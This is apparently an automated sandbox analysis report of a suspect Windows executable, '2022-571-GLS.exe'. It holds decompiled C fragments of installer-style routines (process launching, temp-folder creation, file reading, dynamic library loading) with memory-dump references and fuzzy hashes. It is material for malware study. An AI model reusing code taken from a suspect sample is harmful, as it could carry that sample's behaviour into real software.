                          0x00406bce
                          0x00000000
                          0x00406bce
                          0x00406a1b
                          0x004069a2
                          0x0040699f

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                          • Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
                          • Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                          • Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404FE7(0xffffffeb, _t13);
				_t15 = E0040555B(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060C3(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C59(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                          0x00401e21
                          0x00401e26
                          0x00401e2c
                          0x00401e33
                          0x00401e36
                          0x00402672
                          0x00401e3c
                          0x00401e3f
                          0x00401e50
                          0x00401e4b
                          0x00401e4b
                          0x00401e65
                          0x00401e6e
                          0x00401e7e
                          0x00401e80
                          0x00401e80
                          0x00401e70
                          0x00401e74
                          0x00401e74
                          0x00401e6e
                          0x00401e87
                          0x00401e8a
                          0x00401e8a
                          0x004028a4
                          0x004028b0

                          APIs
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                            • Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                            • Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D
                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                          • GetExitCodeProcess.KERNELBASE ref: 00401E65
                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                          • String ID:
                          • API String ID: 3521207402-0
                          • Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                          • Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
                          • Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                          • Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040365C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0040365C() {
				void* _t1;
				void* _t2;
				void* _t4;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E004036B9();
				_t4 = E00405620(_t7, _t12, "C:\\Users\\jones\\AppData\\Local\\Temp\\nso2766.tmp\\", 7); // executed
				return _t4;
			}








                          0x0040365c
                          0x0040366b
                          0x0040366e
                          0x00403670
                          0x00403670
                          0x00403677
                          0x0040367f
                          0x00403682
                          0x00403684
                          0x00403684
                          0x00403684
                          0x0040368b
                          0x00403697
                          0x0040369d

                          APIs
                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nso2766.tmp\, xrefs: 00403692
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\nso2766.tmp\
                          • API String ID: 2962429428-1546773227
                          • Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                          • Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
                          • Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                          • Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423fb0; // 0x5c07ec
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42376c =  *0x42376c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
					}
				}
				return 0;
			}












                          0x0040138a
                          0x004013fa
                          0x00401392
                          0x0040139b
                          0x004013a0
                          0x00000000
                          0x00000000
                          0x004013a2
                          0x004013a3
                          0x004013ad
                          0x00000000
                          0x00401404
                          0x004013b0
                          0x004013b7
                          0x004013bd
                          0x004013be
                          0x004013c0
                          0x004013c2
                          0x004013b9
                          0x004013b9
                          0x004013ba
                          0x004013ba
                          0x004013c9
                          0x004013cb
                          0x004013f4
                          0x004013f4
                          0x004013c9
                          0x00000000

                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                          • Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
                          • Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                          • Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406087 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00406087(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409248);
				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
				}
				_t5 = E0040601D(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                          0x0040608f
                          0x00406092
                          0x00406099
                          0x004060a1
                          0x004060ad
                          0x00000000
                          0x004060b4
                          0x004060a4
                          0x004060ab
                          0x00000000
                          0x004060bc
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                            • Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
                            • Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
                            • Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                          • Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
                          • Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                          • Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004059D2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E004059D2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                          0x004059d6
                          0x004059e3
                          0x004059f8
                          0x004059fe

                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\2022-571-GLS.exe,80000000,00000003), ref: 004059D6
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                          • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405526 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405526(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                          0x0040552c
                          0x00405534
                          0x00000000
                          0x0040553a
                          0x00000000

                          APIs
                          • CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
                          • GetLastError.KERNEL32 ref: 0040553A
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                          • Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
                          • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                          • Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004059B3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004059B3(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                          0x004059b7
                          0x004059c0
                          0x004059c9
                          0x00000000
                          0x004059c9
                          0x004059cf

                          APIs
                          • GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                          • Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
                          • Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                          • Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004031D5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004031D5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                          0x004031d9
                          0x004031ec
                          0x004031f4
                          0x00000000
                          0x004031fb
                          0x00000000
                          0x004031fd

                          APIs
                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413120,0040B120,004030DA,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                          • Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
                          • Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                          • Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403207 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403207(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                          0x00403215
                          0x0040321b

                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,000083E4), ref: 00403215
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                          • Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
                          • Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                          • Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405819 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405819(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                          0x00405819
                          0x0040582c
                          0x0040582c
                          0x00405830
                          0x00000000
                          0x00000000
                          0x00405823
                          0x00405826
                          0x00000000
                          0x00405826
                          0x00000000
                          0x00405823
                          0x00405832

                          APIs
                          • CharNextA.USER32(?,0040333C,"C:\Users\user\Desktop\2022-571-GLS.exe",00409130), ref: 00405826
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID:
                          • API String ID: 3213498283-0
                          • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                          • Instruction ID: 348458bb0fd59f82f13d2927d6ae723a1903e9450c7162a3bd68018b085bfddc
                          • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                          • Instruction Fuzzy Hash: 08C0803644C5406BC6507720542447F7FE4AAA1340F54D467FCC163150C2346C60CB3A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 00405125 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

